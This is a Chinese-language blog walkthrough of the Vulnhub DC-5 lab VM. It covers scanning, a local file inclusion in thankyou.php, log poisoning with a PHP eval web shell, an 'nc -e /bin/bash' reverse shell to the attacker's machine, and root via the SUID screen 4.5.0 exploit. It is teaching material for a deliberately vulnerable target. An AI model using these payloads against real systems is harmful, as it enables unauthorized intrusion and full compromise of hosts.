【Vulnhub靶机】DC-5(suid提权)

DC-5文档

信息收集

靶机MAC地址:00:0C:29:CB:E4:31

主机扫描

netdiscover -r 192.168.80.0/24

image-20230806191613234

端口扫描

nmap -sV -p- 192.168.80.139

image-20230806191703134

漏洞发现

浏览器访问80端口

image-20230806191746245

找找有没有能够利用的地方,在Contact里发现了类似提交的 东西

image-20230806191836140

发现点击Submit提交后,页面会发生变化

image-20230806191957268

image-20230806192005224

用bp抓包看看

请添加图片描述

将抓取到的数据包发送到Repeater,点击Send查看返回的数据

请添加图片描述

请添加图片描述

不断点击,发现footer不断变化,说明这里可能存在一个独立的脚本文件

爆破一下目录看看

dirsearch -u 192.168.80.139 -i 200

image-20230806192427575

浏览器访问这个http://192.168.80.139/footer.php 目录

每点击一次页面上的数字就会变

image-20230806192545346

改成文件包含的形式?file=发现同样可以

image-20230806192924313

确定这里存在文件包含漏洞

漏洞利用

改变访问路径为/thankyou.php?file=/etc/passwd ,可以看到passwd文件内容了

image-20230806193235167

说明了程序代码在处理包含文件的时候没有严格控制。我们可以把访问路径更改为木马文件

 /thankyou<?php @eval($_REQUEST[123]);?>

image-20230806193854240

发现报 404未找到的错误

对于配置了nginx的网站,无论网站有什么操作,都会被记录在/var/log/nginx/access.log/var/log/nginx/error.log里面

/thankyou.php?file=/var/log/nginx/access.log

image-20230806195156826

木马已经上传,利用中国蚁剑来连接访问

http://192.168.80.139/thankyou.php?file=/var/log/nginx/access.log

image-20230806195305274

接下来进行反弹shell

kali开启监听

nc -lvvp 8989 

image-20230806195427316

利用中国蚁剑打开虚拟终端,反弹shell到攻击机kali上

nc -e /bin/bash 192.168.80.141 8989

image-20230806195624840

image-20230806195814105

再看kali这边 ,就已经监听到了

image-20230806195829012

使用python脚本开启交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

image-20230806200020629

查看当前权限,发现只是普通的权限

image-20230806200057712

下一步就该提权了

权限提升

find / -user root -perm /4000 2>/dev/null

image-20230806200209010

发现screen-4.5.0比较可疑,尝试用searchsploit搜索是否存在漏洞

再打开一个终端,进行漏洞查找

searchsploit screen 4.5.0

image-20230806200344787

找出41154.sh的绝对路径

searchsploit -p linux/local/41154.sh

image-20230806200639052

查看文件内容

cat /usr/share/exploitdb/exploits/linux/local/41154.sh 

image-20230806202051823

按照文件的说明,可分为三部分,将第一个框里内容保存为第一文件,名为libhax.c,然后使用黄色选取的命令编译,编译结束会生成libhax.so文件。

第二个框里内容保存为rootshell.c文件,使用黄色选区的命令编译,编译结束后生成rootshell文件。

将第三个框里内容保存为第三个文件,保存为run.sh 。 这个名字随意。

第一个文件

请添加图片描述

第二个文件

请添加图片描述

第三个文件

请添加图片描述

libhax.c和rootshell.c拖进 蚁剑

image-20230806202906263
libhax.c和rootshell.c这两个文件进行编译
image-20230806203137321

进到蚁剑的文件管理里面,刷新一下,就能看到编译好的两个文件了

image-20230806203244901

然后把run.sh也拖进蚁剑里来, 注意是/tmp

image-20230806203421888

这个时候可以把libhax.c和rootshell.c这两个文件删除 ,因为已经编译好了,留他们也没有用了

请添加图片描述
请添加图片描述

进到kali的python交互shell里,切换到/tmp目录下

image-20230806203854543

运行run.sh 输入bash ./run.sh 提权

image-20230806204153258

可以进行whoami查看我是谁

image-20230806204221570

进到/root查看有无flag

image-20230806204344552

总结

信息收集
	主机发现  netdiscouver
	端口扫描  nmap
	目录爆破  dirsearch
漏洞利用
	bp抓包分析footer.php,有文件包含漏洞
	木马上传,查看日志
	反弹shell
	python交互shell
提权
	find / -user root -perm /4000 2>/dev/null
	searchsploit screen 4.5.0
	libhax.c和rootshell.c文件的编译  run.sh
	bash ./run.sh  提权
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值